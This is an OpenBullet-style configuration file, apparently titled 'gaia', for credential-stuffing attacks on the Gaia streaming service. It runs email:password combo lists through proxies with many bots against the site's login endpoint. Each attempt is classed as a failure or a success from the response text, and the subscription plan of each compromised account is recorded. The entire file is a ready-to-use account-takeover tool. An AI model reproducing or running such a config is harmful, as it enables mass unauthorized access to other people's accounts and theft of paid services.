[SETTINGS]
{
  "Name": "gaia",
  "SuggestedBots": 100,
  "LastModified": "2018-06-03T22:26:41.2317524+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#LOGIN_(POST) REQUEST POST "https://auth.gaia.com/v1/login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&device=web-app" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.gaia.com/" 
  HEADER "origin: https://www.gaia.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Sorry, unrecognized username or password" 
  KEYCHAIN Success OR 
    KEY "success\":true" 
PARSE "<SOURCE>" LR "subscriptions\":[" "]," Recursive=FALSE -> CAP "PLAN" "" "" 
